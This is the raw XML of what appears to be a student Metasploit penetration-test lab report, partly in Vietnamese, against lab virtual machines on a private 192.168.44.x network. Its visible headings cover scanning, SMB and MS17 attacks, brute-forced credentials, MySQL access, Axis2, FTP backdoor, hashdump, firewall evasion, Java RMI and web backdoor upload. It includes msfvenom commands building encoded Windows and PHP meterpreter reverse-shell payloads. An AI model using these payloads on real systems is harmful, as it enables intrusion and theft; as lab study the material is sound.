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7D32" w14:textId="583274B5" w:rsidR="00F36EEF" w:rsidRPr="00F36EEF" w:rsidRDefault="000B2C12" w:rsidP="002465E2">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F36EEF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>MSF PENTEST REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E490C5" w14:textId="729279FB" w:rsidR="002465E2" w:rsidRDefault="002465E2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OPOLOGY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BCDA6A" w14:textId="2292A134" w:rsidR="002465E2" w:rsidRPr="002465E2" w:rsidRDefault="002465E2" w:rsidP="002465E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002465E2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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5E2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>192.168.44.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A28DD75" w14:textId="1A9AA9D5" w:rsidR="002465E2" w:rsidRPr="002465E2" w:rsidRDefault="002465E2" w:rsidP="002465E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002465E2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>me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5E2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>192.168.44.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E36292" w14:textId="5A7FCCFB" w:rsidR="002465E2" w:rsidRPr="002465E2" w:rsidRDefault="002465E2" w:rsidP="002465E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002465E2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">wi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5E2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>192.168.44.130</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23767E44" w14:textId="677F66B6" w:rsidR="002465E2" w:rsidRPr="002465E2" w:rsidRDefault="002465E2" w:rsidP="002465E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002465E2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>U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5E2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>192.168.44.132</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02690960" w14:textId="77777777" w:rsidR="002465E2" w:rsidRDefault="002465E2" w:rsidP="00F36EEF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DBD7A7C" w14:textId="6E3F0328" w:rsidR="00F36EEF" w:rsidRDefault="00F36EEF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6EEF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>RECON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7138C3" w14:textId="6992C532" w:rsidR="00F36EEF" w:rsidRDefault="00F36EEF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6EE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F0C806" wp14:editId="7B50F20E">
            <wp:extent cx="5943600" cy="1389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F25F" w14:textId="3295ECDF" w:rsidR="000A42A8" w:rsidRDefault="000A42A8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ACEFFE" w14:textId="12995476" w:rsidR="000A42A8" w:rsidRDefault="00D12B78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D369CB" w:rsidRPr="00D369CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>db_nmap -sS -sV -Pn -p- 192.168.44.129,130,132</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BA4A8C" w14:textId="47D5A7BB" w:rsidR="00F87F59" w:rsidRDefault="00D12B78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12B7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42D3703" wp14:editId="15C80429">
            <wp:extent cx="5943600" cy="541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7A40" w14:textId="43AECC28" w:rsidR="005B30E4" w:rsidRDefault="005B30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3DAEB62" w14:textId="6EDE8540" w:rsidR="005B30E4" w:rsidRDefault="005B30E4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30E4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12453F9" wp14:editId="2351C02B">
            <wp:extent cx="5943600" cy="5045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68B" w14:textId="0EA9E1C2" w:rsidR="007A20B9" w:rsidRDefault="007A20B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64696A9" w14:textId="61A4DCFA" w:rsidR="00DF6380" w:rsidRDefault="007A20B9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NALYZE SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBE547D" w14:textId="4ACA6811" w:rsidR="007A20B9" w:rsidRDefault="006D08C8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8C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0761CC4" wp14:editId="09ACF1F1">
            <wp:extent cx="5943600" cy="1546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2E2" w14:textId="2864DD8D" w:rsidR="006D08C8" w:rsidRDefault="006D08C8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8C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E46ECC8" wp14:editId="727116E1">
            <wp:extent cx="5943600" cy="3783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3933" w14:textId="11631E3D" w:rsidR="00686FD9" w:rsidRDefault="00686FD9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8BD34B" w14:textId="3808AB1F" w:rsidR="00686FD9" w:rsidRDefault="00686FD9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t rhosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F99A49F" w14:textId="04139405" w:rsidR="00686FD9" w:rsidRPr="00686FD9" w:rsidRDefault="00686FD9" w:rsidP="00F36EEF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C6CEF86" w14:textId="0A699B84" w:rsidR="006D08C8" w:rsidRDefault="006D08C8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8C8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684B8E4" wp14:editId="0B45A8CE">
            <wp:extent cx="5943600" cy="3942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BEAB" w14:textId="7E2245E6" w:rsidR="006D08C8" w:rsidRDefault="006D08C8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8C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C311875" wp14:editId="02844D26">
            <wp:extent cx="5782482" cy="229584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0B4" w14:textId="54AE711B" w:rsidR="00224C83" w:rsidRDefault="00224C83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35EA55" w14:textId="066B8A56" w:rsidR="007D5FAA" w:rsidRDefault="007D5F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6A6B558" w14:textId="3ED5EC83" w:rsidR="007D5FAA" w:rsidRDefault="007D5FAA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ttack smb ms17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDF3149" w14:textId="11BDF522" w:rsidR="007D5FAA" w:rsidRDefault="007D5FAA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5FA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612315C" wp14:editId="1D24397B">
            <wp:extent cx="5943600" cy="4775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DD6" w14:textId="43CC839F" w:rsidR="007D5FAA" w:rsidRDefault="007D5FAA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2F68C3" w14:textId="77777777" w:rsidR="00E443EC" w:rsidRDefault="00E443EC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9A0ED0" w14:textId="77777777" w:rsidR="00E443EC" w:rsidRDefault="00E443EC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CFB3D7" w14:textId="77777777" w:rsidR="00E443EC" w:rsidRDefault="00E443E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7E24235" w14:textId="1237193B" w:rsidR="00E61964" w:rsidRDefault="00E61964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mb login:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0251D609" w14:textId="18A1A0D4" w:rsidR="00E61964" w:rsidRDefault="00E61964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6196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3E7742F" wp14:editId="0A0E4E4B">
            <wp:extent cx="5943600" cy="60725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9F17" w14:textId="09DB5424" w:rsidR="007F45EB" w:rsidRDefault="00975947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ruteforce smb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E37A4F2" w14:textId="075D834F" w:rsidR="006B6A11" w:rsidRDefault="00975947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7594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2124B6B" wp14:editId="1E646317">
            <wp:extent cx="5943600" cy="1108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1ACF" w14:textId="79288F3B" w:rsidR="006B6A11" w:rsidRDefault="006B6A1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372A18" w:rsidRPr="00372A18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276A2549" wp14:editId="4EF070EA">
            <wp:extent cx="5943600" cy="5849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BC8D" w14:textId="7F26EBA7" w:rsidR="00372A18" w:rsidRDefault="00372A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ết quả: vagrant: vagrant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132B6FFD" w14:textId="0473FC61" w:rsidR="00653DFE" w:rsidRDefault="00653DF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0A5C2F1" w14:textId="37E370B5" w:rsidR="00653DFE" w:rsidRDefault="001C55B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YSQL recon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6793F1" w14:textId="71CD6BF6" w:rsidR="001C55B3" w:rsidRDefault="001C55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55B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D3AD169" wp14:editId="019E0063">
            <wp:extent cx="5943600" cy="164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FF2" w14:textId="4BECA932" w:rsidR="005A12D7" w:rsidRDefault="005A12D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A12D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4656ED" wp14:editId="7AA61D40">
            <wp:extent cx="5943600" cy="557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355" w14:textId="666F3A7E" w:rsidR="00FD23DB" w:rsidRDefault="00FD23D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23F313" w14:textId="165B4A89" w:rsidR="00FD23DB" w:rsidRDefault="00FD23D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4724E3" w14:textId="1D905AE5" w:rsidR="0087237C" w:rsidRDefault="0087237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ysql version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FBC73A" w14:textId="35639C05" w:rsidR="0087237C" w:rsidRDefault="008723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237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4361E7D" wp14:editId="00CF8D12">
            <wp:extent cx="5943600" cy="2663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07F7" w14:textId="77777777" w:rsidR="009C52B6" w:rsidRDefault="009C52B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965334D" w14:textId="6901D735" w:rsidR="0087237C" w:rsidRDefault="0087237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ysql login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E03804B" w14:textId="21777315" w:rsidR="00975947" w:rsidRDefault="00FB569B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569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C86E483" wp14:editId="67DEC823">
            <wp:extent cx="5943600" cy="4732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C2DE" w14:textId="3C7A46C7" w:rsidR="0027455D" w:rsidRDefault="0027455D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uy vấn DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FA2539" w14:textId="319A88A2" w:rsidR="00DA158C" w:rsidRDefault="00DA158C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158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078718A" wp14:editId="77A887EE">
            <wp:extent cx="4201111" cy="19624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DD78" w14:textId="1773BCA2" w:rsidR="0027455D" w:rsidRDefault="0027455D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7455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0436FBB" wp14:editId="250BEFE2">
            <wp:extent cx="5943600" cy="4772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6067" w14:textId="0BC9323F" w:rsidR="00DA158C" w:rsidRDefault="00DA158C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158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7B92189" wp14:editId="5399D9D2">
            <wp:extent cx="5943600" cy="7308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4406" w14:textId="09E82F70" w:rsidR="005D5443" w:rsidRDefault="005D5443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158C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2B709AB4" wp14:editId="47D4A4D0">
            <wp:extent cx="5943600" cy="43224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FFDD" w14:textId="77777777" w:rsidR="003C5A2D" w:rsidRDefault="003C5A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1B7ADB3" w14:textId="5EF69FE5" w:rsidR="007D6360" w:rsidRDefault="007D6360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6360">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Authenticated Code Execution in Axis2 Business</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0423B19D" w14:textId="31CB14A2" w:rsidR="00BD7D4F" w:rsidRDefault="00BD7D4F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E348F7" w14:textId="01837F43" w:rsidR="00A074F9" w:rsidRDefault="00A074F9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ên máy metas3 2k8 có chạy dịch vụ apache ( metas3 lỗi trên vmware không open port 8282 nên sẽ demo trên virtualbox)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB5D8CD" w14:textId="2E1A62C5" w:rsidR="00A074F9" w:rsidRDefault="00A074F9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074F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0035D81" wp14:editId="5BCF6275">
            <wp:extent cx="5943600" cy="1659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9B6" w14:textId="5DDA07E0" w:rsidR="003A4CE5" w:rsidRDefault="003A4CE5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u khi quét được version thì search gg ra cve, sau đó search lại ở msf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106CF9E4" w14:textId="1E37011C" w:rsidR="004F23E6" w:rsidRDefault="004F23E6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F23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F3258D4" wp14:editId="52E68771">
            <wp:extent cx="5943600" cy="19069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3669" w14:textId="5BA81510" w:rsidR="003C5A2D" w:rsidRDefault="00C00605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00605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A3CF089" wp14:editId="58002222">
            <wp:extent cx="5943600" cy="48088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D858" w14:textId="18583A81" w:rsidR="00433C05" w:rsidRDefault="00433C05" w:rsidP="00F36E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CB9747" w14:textId="77777777" w:rsidR="0027455D" w:rsidRDefault="0027455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D37ABA0" w14:textId="3235CB78" w:rsidR="00181C4F" w:rsidRDefault="00CE5CA5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FTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12377724" w14:textId="7FEBC90E" w:rsidR="00CE5CA5" w:rsidRDefault="00CE5CA5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CE5CA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ED85C41" wp14:editId="09BFE7E4">
            <wp:extent cx="5943600" cy="2384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1F91" w14:textId="4D8D9CD5" w:rsidR="001F34BA" w:rsidRDefault="001F34B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1F34B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448A2E4" wp14:editId="3EAB9BED">
            <wp:extent cx="5943600" cy="1265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7CAE" w14:textId="6CDCAC7C" w:rsidR="009704CB" w:rsidRDefault="00E46315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E4631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0F3A4A0" wp14:editId="37592DB1">
            <wp:extent cx="5943600" cy="3408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0CD4" w14:textId="39A8990B" w:rsidR="004208D4" w:rsidRDefault="004208D4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ăng nhập ftp không cần password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14040F12" w14:textId="098B24A7" w:rsidR="000D5D50" w:rsidRDefault="004208D4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4208D4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00B53324" wp14:editId="5409DE83">
            <wp:extent cx="5943600" cy="2571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C604" w14:textId="531EF78B" w:rsidR="00C333F5" w:rsidRDefault="00C333F5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TP BACKDOOR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660B6C1B" w14:textId="09C47A57" w:rsidR="00C333F5" w:rsidRDefault="0010527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10527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6BE661F" wp14:editId="6324CB69">
            <wp:extent cx="5943600" cy="508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F76" w14:textId="77777777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2B990C3B" w14:textId="77777777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7C38269" w14:textId="77777777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1AEF6E3" w14:textId="77777777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6B7A3DB2" w14:textId="77777777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BEF9332" w14:textId="77777777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64CCB34" w14:textId="77777777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1960DF5" w14:textId="3305A498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t exploit </w:t>
      </w:r>
      <w:r w:rsidR="00670BCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> ftp</w:t>
      </w:r>
      <w:r w:rsidR="00205A79">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> - hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292918F4" w14:textId="134CD408" w:rsidR="00BC214F" w:rsidRDefault="00BC214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BC214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56EE464" wp14:editId="4B2BC930">
            <wp:extent cx="5943600" cy="3851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E057" w14:textId="13A03284" w:rsidR="0024398F" w:rsidRDefault="0024398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AFFF09D" w14:textId="77777777" w:rsidR="0024398F" w:rsidRDefault="0024398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3BE9B51" w14:textId="1E2DB831" w:rsidR="0024398F" w:rsidRDefault="0024398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vade firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A01F4D3" w14:textId="7E89DF06" w:rsidR="0024398F" w:rsidRDefault="0024398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24398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63976FC" wp14:editId="598C82FC">
            <wp:extent cx="5943600" cy="16554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F573" w14:textId="1CA1DD74" w:rsidR="0024398F" w:rsidRDefault="0024398F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24398F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>sudo msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 3 -f exe LHO= 192.168.44.128 LPORT=4447 -o eva.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B96776" w14:textId="4BC2D5CF" w:rsidR="000672DB" w:rsidRDefault="000672DB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CD3C82A" w14:textId="77777777" w:rsidR="00777C95" w:rsidRDefault="00777C9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C914C08" w14:textId="2A5E4041" w:rsidR="000672DB" w:rsidRDefault="000672DB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ATTACK RMI JAVA </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0252B4A9" w14:textId="63B2E931" w:rsidR="00AB7BC7" w:rsidRDefault="00AB7BC7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AB7BC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92CBFEC" wp14:editId="1D6381BA">
            <wp:extent cx="5943600" cy="4839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2705" w14:textId="77777777" w:rsidR="00EC2D2A" w:rsidRDefault="00EC2D2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59843" w14:textId="77777777" w:rsidR="00EC2D2A" w:rsidRDefault="00EC2D2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2D66DA50" w14:textId="77777777" w:rsidR="00EC2D2A" w:rsidRDefault="00EC2D2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8FB57" w14:textId="77777777" w:rsidR="00EC2D2A" w:rsidRDefault="00EC2D2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CFBCA3C" w14:textId="77777777" w:rsidR="00EC2D2A" w:rsidRDefault="00EC2D2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7C44292" w14:textId="77777777" w:rsidR="00EC2D2A" w:rsidRDefault="00EC2D2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EA39A96" w14:textId="77777777" w:rsidR="00EC2D2A" w:rsidRDefault="00EC2D2A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61A8F968" w14:textId="3F3AD253" w:rsidR="00777C95" w:rsidRDefault="00A6538D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Xem th</w:t>
      </w:r>
      <w:r w:rsidR="00EC2D2A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>ê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m thông tin </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E63AAB" w14:textId="318BE8D0" w:rsidR="00A6538D" w:rsidRDefault="00A6538D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A6538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86D4392" wp14:editId="52768CE7">
            <wp:extent cx="5943600" cy="4500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39D8" w14:textId="46E3D376" w:rsidR="00923A77" w:rsidRDefault="00923A77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923A7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75D965E" wp14:editId="40E900A3">
            <wp:extent cx="5943600" cy="55429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7D1F" w14:textId="77777777" w:rsidR="00AF3844" w:rsidRDefault="00AF384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D3435DA" w14:textId="7FA3B5AC" w:rsidR="00AF3844" w:rsidRDefault="00AF3844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xploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE156C7" w14:textId="257E0CFF" w:rsidR="00AF3844" w:rsidRDefault="00AF3844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AF384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EDB951B" wp14:editId="582F312A">
            <wp:extent cx="5943600" cy="57702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C53" w14:textId="75DF31AE" w:rsidR="00AF3844" w:rsidRDefault="00AF3844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AF3844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94F9BE3" wp14:editId="15CC8ED9">
            <wp:extent cx="5943600" cy="582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3E3E" w14:textId="77777777" w:rsidR="0084792C" w:rsidRDefault="008479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E81DA7F" w14:textId="4424D26B" w:rsidR="008A5CE5" w:rsidRDefault="008A5CE5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Đẩy exploit vào stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CE79D6" w14:textId="4D0DF048" w:rsidR="0084792C" w:rsidRDefault="0084792C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8479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B8020CA" wp14:editId="09AD3EE8">
            <wp:extent cx="5943600" cy="2384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247E" w14:textId="06C75976" w:rsidR="00141AF1" w:rsidRDefault="00141AF1" w:rsidP="00520A15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xploit rmi server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9E1AF6" w14:textId="7A20FCA4" w:rsidR="000D5D50" w:rsidRDefault="002E462E" w:rsidP="00E471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462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DACBB64" wp14:editId="569DADCA">
            <wp:extent cx="5943600" cy="1727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6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D5D50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E471BE" w:rsidRPr="00E471BE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Crawler trong MSF – HTTP và cách upload safe BACKDOOR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C281BCD" w14:textId="77777777" w:rsidR="00E36742" w:rsidRDefault="00E36742" w:rsidP="00E471BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1299D6F9" w14:textId="39AEDB1D" w:rsidR="00E36742" w:rsidRDefault="00E36742" w:rsidP="00E471BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E36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8ADE6" wp14:editId="0EFD1223">
            <wp:extent cx="5943600" cy="2839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ADF" w14:textId="6D899FC2" w:rsidR="00AF6F76" w:rsidRPr="007E50B4" w:rsidRDefault="00AF6F76" w:rsidP="00E471BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF6F76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>services -s http -O 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A54772" w14:textId="3AFEAD58" w:rsidR="004208D4" w:rsidRDefault="00B800CB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B800C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B12F718" wp14:editId="7C6252ED">
            <wp:extent cx="5943600" cy="2496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ED72" w14:textId="06850F5C" w:rsidR="00D70687" w:rsidRDefault="00D70687" w:rsidP="00C62F98">
      <w:pPr>
        <w:ind w:left="720" w:hanging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12245" w14:textId="77777777" w:rsidR="00276F74" w:rsidRDefault="00276F74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8C385" w14:textId="77777777" w:rsidR="00276F74" w:rsidRDefault="00276F74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57052B" w14:textId="4B43180F" w:rsidR="00276F74" w:rsidRDefault="001868AF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et </w:t>
      </w:r>
      <w:r w:rsidR="00861269">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>, p</w:t>
      </w:r>
      <w:r w:rsidR="00861269">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>or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in </w:t>
      </w:r>
      <w:r w:rsidR="00276F74">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>crawler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AAF465" w14:textId="3D694A5F" w:rsidR="00D02BF1" w:rsidRDefault="00D02BF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02BF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30DDEC5" wp14:editId="4F341102">
            <wp:extent cx="5943600" cy="2108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7D2" w14:textId="3E254C4C" w:rsidR="001868AF" w:rsidRDefault="00EF20EC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ích vào link uploads</w:t>
      </w:r>
      <w:r w:rsidR="00956693">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> – 0 có file nào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691C90D8" w14:textId="65BECD6F" w:rsidR="00EF20EC" w:rsidRDefault="00EF20EC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F20E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232EAB1" wp14:editId="2F752A03">
            <wp:extent cx="5943600" cy="3891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1322" w14:textId="37ECE271" w:rsidR="00956693" w:rsidRDefault="009566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5B7D2EF" w14:textId="0B582FFB" w:rsidR="00956693" w:rsidRDefault="00956693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ấn công </w:t>
      </w:r>
      <w:r w:rsidR="008A27F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">http </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>upload file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C55B9F6" w14:textId="3DE70085" w:rsidR="00956693" w:rsidRDefault="00956693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69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BF208C8" wp14:editId="1461B519">
            <wp:extent cx="5943600" cy="5099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A09B" w14:textId="77777777" w:rsidR="0015224E" w:rsidRDefault="0015224E" w:rsidP="001522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0B359C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>ạo và upload backdoor lên Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D15964" w14:textId="77777777" w:rsidR="0015224E" w:rsidRDefault="0015224E" w:rsidP="001522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78F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A7AA545" wp14:editId="6E2309DA">
            <wp:extent cx="5943600" cy="12490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0733" w14:textId="77777777" w:rsidR="0015224E" w:rsidRDefault="0015224E" w:rsidP="0015224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um ra được đường link uploads file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A4205F" w14:textId="77777777" w:rsidR="0015224E" w:rsidRDefault="0015224E" w:rsidP="001522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20D3C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13DDC77" wp14:editId="4D3FAD34">
            <wp:extent cx="5763429" cy="334374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349" w14:textId="77777777" w:rsidR="0015224E" w:rsidRDefault="0015224E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10FF89" w14:textId="77777777" w:rsidR="002A178F" w:rsidRDefault="002A178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3FC1DF4" w14:textId="3A15E578" w:rsidR="002A178F" w:rsidRDefault="002A178F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MP ENUM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BB5764" w14:textId="30BAD8B4" w:rsidR="008600E9" w:rsidRDefault="00DF2357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F235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5A6258A" wp14:editId="225D664B">
            <wp:extent cx="5943600" cy="5086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940" w14:textId="1419DEF5" w:rsidR="003A1D50" w:rsidRDefault="003A1D50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ẠO PHP UPLOAD BACKDOOR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745C2A6F" w14:textId="77777777" w:rsidR="00D618D5" w:rsidRDefault="00D618D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18D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>msfvenom -p php/meterpreter/reverse_tcp -f raw LHO= 192.168.44.128 LPORT=8585 -o nweb.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24650DE9" w14:textId="776741A1" w:rsidR="00D618D5" w:rsidRDefault="00D618D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18D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F4DC5B5" wp14:editId="1896C7D5">
